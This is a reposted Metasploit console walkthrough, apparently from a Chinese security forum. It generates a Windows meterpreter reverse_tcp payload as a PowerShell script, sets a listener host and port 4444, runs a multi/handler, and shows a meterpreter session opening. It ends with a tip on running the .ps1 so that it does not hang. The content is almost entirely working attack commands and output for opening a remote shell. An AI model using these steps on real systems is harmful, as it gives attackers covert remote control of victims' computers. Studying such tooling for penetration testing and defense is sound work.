=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 969 exploits - 511 auxiliary - 155 post
+ -- --=[ 261 payloads - 28 encoders - 8 nops

msf > use windows/meterpreter/reverse_tcp
msf  payload(reverse_tcp) > set LHOST 172.24.24.41
LHOST => 172.24.24.41
msf  payload(reverse_tcp) > generate -t psh -f pwShell.ps1
[*] Writing 2909 bytes to pwShell.ps1...
msf  payload(reverse_tcp) > use multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 172.24.24.41
LHOST => 172.24.24.41
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     172.24.24.41     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > exploit

[*] Started reverse handler on 172.24.24.41:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 172.24.24.41
[*] Meterpreter session 1 opened (172.24.24.41:4444 -> 172.24.24.41:26520) at 2012-10-10 17:09:30 +0800

meterpreter > getpid
Current pid: 5708
meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1


C:\Users\Administrator>powershell -File c:\metasploit\msf3\pwShell.ps1
35520512
Doing it this way often hangs; it is better to do it like this:


Windows PowerShell
版权所有 (C) 2012 Microsoft Corporation。保留所有权利。

PS C:\Users\Administrator> cd C:\metasploit\msf3
PS C:\metasploit\msf3> .\pwShell.ps1
73662464
73662465
73662466
73662467
73662468
73662469

Reposted from: http://zone.wooyun.org/content/1261